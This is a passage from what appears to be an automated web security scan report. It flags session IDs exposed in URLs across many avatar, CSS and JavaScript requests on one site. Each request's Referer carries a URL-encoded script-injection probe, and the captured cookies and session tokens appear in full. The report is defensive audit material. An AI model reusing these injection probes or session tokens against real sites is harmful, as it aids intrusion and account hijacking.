Content-Language: en-US
JP: D=12230 t=1313157143974612
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.29. https://www.x.com/people/mikertjones/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mikertjones/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mikertjones/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9603 t=1313157137187386
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.30. https://www.x.com/people/moneygun/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/moneygun/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/moneygun/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1013 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1013"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7141 t=1313157136784012
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 2959

...[SNIP]...

3.31. https://www.x.com/people/pdumas/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/pdumas/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/pdumas/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7093 t=1313157137047579
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.32. https://www.x.com/people/structuralartistry/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/structuralartistry/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/structuralartistry/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10206 t=1313157137208695
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.33. https://www.x.com/people/theatreus/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/theatreus/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/theatreus/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:03 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9054 t=1313158263705381
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.34. https://www.x.com/people/thomlizpa/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/thomlizpa/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/thomlizpa/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8367 t=1313157137320405
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.35. https://www.x.com/people/tifroz/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tifroz/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tifroz/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=12547 t=1313157143974667
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.36. https://www.x.com/people/tim_hunt/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/tim_hunt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/tim_hunt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7508 t=1313157137035182
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.37. https://www.x.com/people/timneu22/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/timneu22/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/timneu22/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:21 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11518 t=1313157142392525
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.38. https://www.x.com/people/vmchatt/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/vmchatt/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/vmchatt/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9494 t=1313157144350838
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.39. https://www.x.com/people/xavijr/avatar

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/xavijr/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/xavijr/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8711 t=1313157143991473
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Length: 1865

...[SNIP]...

3.40. https://www.x.com/plugins/app-type-plugin/styles/app.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/app-type-plugin/styles/app.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/app-type-plugin/styles/app.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 16107
JP: D=316 t=1313157136338896
Vary: User-Agent
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

.jive-icon-app-sml {
background-image: url( ../images/app-12x12.gif);
background-position: 0 0;
}

.jive-icon-app-med {
background-image: url( ../images/app-16x16.gif);
background-posi
...[SNIP]...

3.41. https://www.x.com/plugins/borderless-widget-plugin/classes/borderless-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/borderless-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/borderless-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:18 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 488
JP: D=25771 t=1313157139008468
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.42. https://www.x.com/plugins/content-widgets/classes/community-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/content-widgets/classes/community-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/content-widgets/classes/community-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 1257
JP: D=524 t=1313157136334441
Vary: User-Agent
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

/* Magical boderless widget */

#jive-widget-content .jive-widget-container .jive-widget-borderless .jive-widget-header {
display: none;
}

#jive-widget-content .jive-widget-container .jive-widget
...[SNIP]...

3.43. https://www.x.com/plugins/digg-style-voting/scripts/plugin.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/scripts/plugin.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/scripts/plugin.js;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:51 GMT
Cache-Control: max-age=60
Content-Type: text/javascript
Content-Length: 4235
JP: D=443 t=1313157136339069
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/engine.js" ></script>');
document.write('<script type="text/javascript" src="' + _jive_base_url + '/dwr/interface/Clearv
...[SNIP]...

3.44. https://www.x.com/plugins/digg-style-voting/styles/plugin.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/digg-style-voting/styles/plugin.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/digg-style-voting/styles/plugin.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:53 GMT
Cache-Control: max-age=60
Content-Type: text/css
Content-Length: 4524
JP: D=324 t=1313157136644480
Vary: User-Agent
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive

.clearvote-container {
padding: 0;
overflow: hidden;
display: block;
float: right;
}

.clearvote-container .clearvote-table {
   border:0;
   border-collapse:collapse;
   float:non
...[SNIP]...

3.45. https://www.x.com/plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /plugins/i18n-html-widget-plugin/classes/borderless-widget.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/i18n-html-widget-plugin/classes/borderless-widget.css;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
